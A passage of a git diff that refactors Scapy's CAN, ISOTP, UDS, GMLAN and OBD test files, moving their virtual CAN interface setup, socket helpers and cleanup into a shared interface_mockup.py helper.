-new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -print("CAN sockets should work now") - -= Overwrite definition for vcan_socket systems native sockets -~ vcan_socket not_pypy needs_root linux - -if six.PY3 and LINUX: - from scapy.contrib.cansocket_native import * - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - - -= Overwrite definition for vcan_socket systems python-can sockets -~ vcan_socket needs_root linux -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface, bitrate=250000, timeout=0.01) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, bitrate=250000, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, bitrate=250000, timeout=0.01) - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - - -= Check if can-isotp and can-utils are installed on this system -~ linux -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - -+ Syntax check - -= Import isotp - -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) - -load_contrib("isotp", globals_dict=globals()) - -if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - assert ISOTPSocket == ISOTPNativeSocket + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - assert ISOTPSocket == ISOTPSoftSocket + execfile("test/contrib/automotive/interface_mockup.py") + ############ ############ @@ -547,10 +437,5 @@ conf.contribs['UDS']['treat-response-pending-as-answer'] = False + Cleanup = Delete vcan interfaces -~ vcan_socket needs_root linux - -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) -if 0 != call(["sudo", "ip", "link", "delete", iface1]): - raise Exception("%s could not be deleted" % iface1) +assert cleanup_interfaces() diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 7ca517c094f..0bc7cb0fc8b 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -4,122 +4,14 @@ + Configuration ~ conf + = Imports -load_layer("can", globals_dict=globals()) -conf.contribs['CAN']['swap-bytes'] = False -import subprocess, sys import scapy.modules.six as six -from subprocess import call -from scapy.consts import LINUX - -= Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" - -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - -= Import CANSocket - -from scapy.contrib.cansocket_python_can import * - -new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface, timeout=0.01) -new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) -new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -print("CAN sockets should work now") - -= Overwrite definition for vcan_socket systems native sockets -~ vcan_socket not_pypy needs_root linux - -if six.PY3 and LINUX: - from scapy.contrib.cansocket_native import * - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - - -= Overwrite definition for vcan_socket systems python-can sockets -~ vcan_socket needs_root linux -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface, timeout=0.001) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, timeout=0.001) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, timeout=0.001) - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - -= Check if can-isotp and can-utils are installed on this system -~ linux -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - -+ Syntax check - -= Import isotp -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) - -load_contrib("isotp", globals_dict=globals()) - -if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - assert ISOTPSocket == ISOTPNativeSocket + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - assert ISOTPSocket == ISOTPSoftSocket + execfile("test/contrib/automotive/interface_mockup.py") ############ ############ @@ -1305,10 +1197,5 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base + Cleanup = Delete vcan interfaces -~ vcan_socket needs_root linux - -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) -if 0 != call(["sudo", "ip", "link", "delete", iface1]): - raise Exception("%s could not be deleted" % iface1) +assert cleanup_interfaces() diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py new file mode 100644 index 00000000000..a87ba45c232 --- /dev/null +++ b/test/contrib/automotive/interface_mockup.py @@ -0,0 +1,191 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + + +# """ Default imports required for setup of CAN interfaces """ + +import os +import subprocess +import sys + +from platform import python_implementation + +from scapy.all import load_layer, load_contrib, conf +import scapy.modules.six as six +from scapy.consts import LINUX + +load_layer("can", globals_dict=globals()) +conf.contribs['CAN']['swap-bytes'] = False + +# ############################################################################ +# """ Define interface names for automotive tests """ +# ############################################################################ +iface0 = "vcan0" +iface1 = "vcan1" + +try: + _root = os.geteuid() == 0 +except AttributeError: + _root = False + +_not_pypy = "pypy" not in python_implementation().lower() + + +def test_and_setup_socket_can(iface_name): + if 0 != subprocess.call(["cansend", iface_name, "000#"]): + # iface_name is not enabled + if 0 != subprocess.call(["sudo", "modprobe", "vcan"]): + raise Exception("modprobe vcan failed") + if 0 != subprocess.call(["sudo", "ip", "link", "add", "name", + iface_name, "type", "vcan"]): + print("add %s failed: Maybe it was already up?" % iface_name) + if 0 != subprocess.call( + ["sudo", "ip", "link", "set", "dev", iface_name, "up"]): + raise Exception("could not bring up %s" % iface_name) + + if 0 != subprocess.call(["cansend", iface_name, "000#"]): + raise Exception("cansend doesn't work") + + +if LINUX and os.geteuid() == 0: + try: + test_and_setup_socket_can(iface0) + test_and_setup_socket_can(iface1) + print("CAN should work now") + except Exception as e: + print(e) + + +# ############################################################################ +# """ Define helper functions for CANSocket creation on all platforms """ +# ############################################################################ +if LINUX and _not_pypy and _root: + if six.PY3: + from scapy.contrib.cansocket_native import * + new_can_socket = NativeCANSocket + new_can_socket0 = lambda: NativeCANSocket(iface0) + new_can_socket1 = lambda: NativeCANSocket(iface1) + can_socket_string_list = ["-c", iface0] + + else: + from scapy.contrib.cansocket_python_can import * + new_can_socket = lambda iface: PythonCANSocket(bustype='socketcan', channel=iface, timeout=0.01) + new_can_socket0 = lambda: PythonCANSocket(bustype='socketcan', channel=iface0, timeout=0.01) + new_can_socket1 = lambda: PythonCANSocket(bustype='socketcan', channel=iface1, timeout=0.01) + can_socket_string_list = ["-i", "socketcan", "-c", iface0] + +else: + from scapy.contrib.cansocket_python_can import * + new_can_socket = lambda iface: PythonCANSocket(bustype='virtual', channel=iface) + new_can_socket0 = lambda: PythonCANSocket(bustype='virtual', channel=iface0, timeout=0.01) + new_can_socket1 = lambda: PythonCANSocket(bustype='virtual', channel=iface1, timeout=0.01) + + +# ############################################################################ +# """ Test if socket creation functions work """ +# ############################################################################ +s = new_can_socket(iface0) +s.close() +s = new_can_socket(iface1) +s.close() + + +def cleanup_interfaces(): + """ + Helper function to remove virtual CAN interfaces after test + + :return: True on success + """ + if LINUX and _not_pypy and _root: + if 0 != subprocess.call(["sudo", "ip", "link", "delete", iface0]): + raise Exception("%s could not be deleted" % iface0) + if 0 != subprocess.call(["sudo", "ip", "link", "delete", iface1]): + raise Exception("%s could not be deleted" % iface1) + return True + + +def drain_bus(iface=iface0, assert_empty=True): + """ + Utility function for draining a can interface, + asserting that no packets are there + + :param iface: Interface name to drain + :param assert_empty: If true, raise exception in case packets were received + """ + with new_can_socket(iface) as s: + pkts = s.sniff(timeout=0.1) + if assert_empty and not len(pkts) == 0: + raise Scapy_Exception( + "Error in drain_bus. Packets found but no packets expected!") + + +print("CAN sockets should work now") + +# ############################################################################ +# """ Setup and definitions for ISOTP related stuff """ +# ############################################################################ + +# ############################################################################ +# function to exit when the can-isotp kernel module is not available +# ############################################################################ +ISOTP_KERNEL_MODULE_AVAILABLE = False + + +def exit_if_no_isotp_module(): + """ + Helper function to exit a test case if ISOTP kernel module is not available + """ + if not ISOTP_KERNEL_MODULE_AVAILABLE: + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) + warning("Can't test ISOTPNativeSocket because " + "kernel module isn't loaded") + exit(0) + + +# ############################################################################ +# """ Evaluate if ISOTP kernel module is installed and available """ +# ############################################################################ +if LINUX and os.geteuid() == 0 and six.PY3: + p1 = subprocess.Popen(['lsmod'], stdout=subprocess.PIPE) + p2 = subprocess.Popen(['grep', '^can_isotp'], + stdout=subprocess.PIPE, stdin=p1.stdout) + p1.stdout.close() + if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): + p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], + stdin=subprocess.PIPE) + p.communicate(b"01") + if p.returncode == 0: + ISOTP_KERNEL_MODULE_AVAILABLE = True + +# ############################################################################ +# """ Save configuration """ +# ############################################################################ +conf.contribs['ISOTP'] = \ + {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} + +# ############################################################################ +# """ reload ISOTP kernel module in case configuration changed """ +# ############################################################################ +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + +load_contrib("isotp", globals_dict=globals()) + +if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: + if not ISOTPSocket == ISOTPNativeSocket: + raise Scapy_Exception("Error in ISOTPSocket import!") +else: + if not ISOTPSocket == ISOTPSoftSocket: + raise Scapy_Exception("Error in ISOTPSocket import!") + +# ############################################################################ +# """ Prepare send_delay on Ecu Answering Machine to stabilize unit tests """ +# ############################################################################ +from scapy.contrib.automotive.ecu import * +print("Set send delay to lower utilization on CI machines") +conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 75c31dd6c5d..eddc01ea97f 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -5,120 +5,13 @@ ~ conf = Imports -load_layer("can", globals_dict=globals()) -conf.contribs['CAN']['swap-bytes'] = False -import subprocess, sys import scapy.modules.six as six -from subprocess import call -from scapy.consts import LINUX - -= Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" - -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - -= Import CANSocket - -from scapy.contrib.cansocket_python_can import * - -new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface) -new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) -new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -= Overwrite definition for vcan_socket systems native sockets -~ vcan_socket not_pypy needs_root linux - -if six.PY3 and LINUX: - from scapy.contrib.cansocket_native import * - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - - -= Overwrite definition for vcan_socket systems python-can sockets -~ vcan_socket needs_root linux -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface, bitrate=250000, timeout=0.01) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, bitrate=250000, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, bitrate=250000, timeout=0.01) - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - - -= Check if can-isotp and can-utils are installed on this system -~ linux -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - -+ Syntax check - -= Import isotp -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) - -load_contrib("isotp", globals_dict=globals()) - -if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - assert ISOTPSocket == ISOTPNativeSocket + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - assert ISOTPSocket == ISOTPSoftSocket + execfile("test/contrib/automotive/interface_mockup.py") + ############ ############ @@ -224,6 +117,7 @@ with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, base s = OBD_Scanner(socket, full_scan=False) s.scan() socket.send(b"\xff\xff\xff") + socket.send(b"\xff\xff\xff") finally: sim.join(timeout=10) @@ -323,10 +217,5 @@ assert len([r for _, _, r in s.enumerators[0].results if r is not None and r.ser + Cleanup = Delete vcan interfaces -~ vcan_socket needs_root linux - -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) -if 0 != call(["sudo", "ip", "link", "delete", iface1]): - raise Exception("%s could not be deleted" % iface1) +assert cleanup_interfaces() diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 867740cf99f..1e77082ee4e 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -5,122 +5,13 @@ ~ conf = Imports -load_layer("can", globals_dict=globals()) -conf.contribs['CAN']['swap-bytes'] = False -import subprocess, sys import scapy.modules.six as six -from subprocess import call -from scapy.consts import LINUX - -= Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" - -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - -= Import CANSocket - -from scapy.contrib.cansocket_python_can import * - -new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface) -new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) -new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -print("CAN sockets should work now") - -= Overwrite definition for vcan_socket systems native sockets -~ vcan_socket not_pypy needs_root linux - -if six.PY3 and LINUX: - from scapy.contrib.cansocket_native import * - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - - -= Overwrite definition for vcan_socket systems python-can sockets -~ vcan_socket needs_root linux -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface, bitrate=250000, timeout=0.01) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, bitrate=250000, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, bitrate=250000, timeout=0.01) - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - - -= Check if can-isotp and can-utils are installed on this system -~ linux -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - -+ Syntax check - -= Import isotp -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) - -load_contrib("isotp", globals_dict=globals()) - -if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - assert ISOTPSocket == ISOTPNativeSocket + exec(open("test/contrib/automotive/interface_mockup.py").read()) else: - assert ISOTPSocket == ISOTPSoftSocket + execfile("test/contrib/automotive/interface_mockup.py") + ############ ############ @@ -206,10 +97,5 @@ assert res_c == ('ExtendedDiagnosticSession', '0x2f: InputOutputControlByIdentif + Cleanup = Delete vcan interfaces -~ vcan_socket needs_root linux - -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) -if 0 != call(["sudo", "ip", "link", "delete", iface1]): - raise Exception("%s could not be deleted" % iface1) +assert cleanup_interfaces() diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index f05cde8b3b3..cf1d5f35b18 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1,23 +1,23 @@ % Regression tests for ISOTP -~ needs_root + Configuration ~ conf = Imports -load_layer("can", globals_dict=globals()) -conf.contribs['CAN']['swap-bytes'] = False -import scapy.modules.six as six -import subprocess, sys + from six.moves.queue import Queue -from subprocess import call from io import BytesIO from scapy.contrib.isotp import get_isotp_packet -from scapy.consts import LINUX + +import scapy.modules.six as six + +if six.PY3: + exec(open("test/contrib/automotive/interface_mockup.py").read()) +else: + execfile("test/contrib/automotive/interface_mockup.py") = Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" + class MockCANSocket(SuperSocket): nonblocking_socket = True @@ -58,89 +58,17 @@ else: dhex = bytes.fromhex -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - -= Import CANSocket - -from scapy.contrib.cansocket_python_can import * - -new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface) -new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) -new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -print("CAN sockets should work now") - -= Overwrite definition for vcan_socket systems python-can sockets -~ vcan_socket needs_root linux -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface, bitrate=250000, timeout=0.01) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, bitrate=250000, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, bitrate=250000, timeout=0.01) - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() - - -= Check if can-isotp and can-utils are installed on this system -~ linux -p1 = subprocess.Popen(['lsmod'], stdout = subprocess.PIPE) -p2 = subprocess.Popen(['grep', '^can_isotp'], stdout = subprocess.PIPE, stdin=p1.stdout) -p1.stdout.close() -if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): - p = subprocess.Popen(["isotpsend", "-s1", "-d0", iface0], stdin = subprocess.PIPE) - p.communicate(b"01") - if p.returncode == 0: - ISOTP_KERNEL_MODULE_AVAILABLE = True - - + Syntax check = Import isotp + conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + +if six.PY3: + import importlib + if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) + load_contrib("isotp", globals_dict=globals()) ISOTPSocket = ISOTPSoftSocket @@ -1537,6 +1465,7 @@ assert(succ) + ISOTPSoftSocket MITM attack tests = bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package forwarding vcan1 +~ needs_root drain_bus(iface0) drain_bus(iface1) @@ -1575,6 +1504,7 @@ drain_bus(iface0) drain_bus(iface1) = bridge and sniff with isotp soft sockets and multiple long packets +~ needs_root drain_bus(iface0) drain_bus(iface1) @@ -1623,6 +1553,7 @@ drain_bus(iface0) drain_bus(iface1) = bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package change vcan1 +~ needs_root drain_bus(iface0) drain_bus(iface1) @@ -2406,12 +2337,6 @@ assert(rSucc) = Cleanup reference to ISOTPSoftSocket to let the thread end s = None - = Delete vcan interfaces -~ vcan_socket needs_root linux - -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) -if 0 != call(["sudo", "ip", "link", "delete", iface1]): - raise Exception("%s could not be deleted" % iface1) +assert cleanup_interfaces() diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 98edfaa100a..ca5d01ff89c 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -8,125 +8,12 @@ ~ conf = Imports -load_layer("can", globals_dict=globals()) -conf.contribs['CAN']['swap-bytes'] = False -import os, subprocess, sys -from subprocess import call import scapy.modules.six as six -from scapy.contrib.isotp import send_multiple_ext, filter_periodic_packets, scan, scan_extended -from scapy.consts import LINUX - -= Definition of constants, utility functions - -iface0 = "vcan0" -iface1 = "vcan1" - -# function to exit when the can-isotp kernel module is not available -ISOTP_KERNEL_MODULE_AVAILABLE = False -def exit_if_no_isotp_module(): - if not ISOTP_KERNEL_MODULE_AVAILABLE: - err = "TEST SKIPPED: can-isotp not available\n" - sys.__stderr__.write(err) - warning("Can't test ISOTP native socket because kernel module is not loaded") - exit(0) - - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - -= Import CANSocket - -from scapy.contrib.cansocket_python_can import * - -new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface) -new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) -new_can_socket1 = 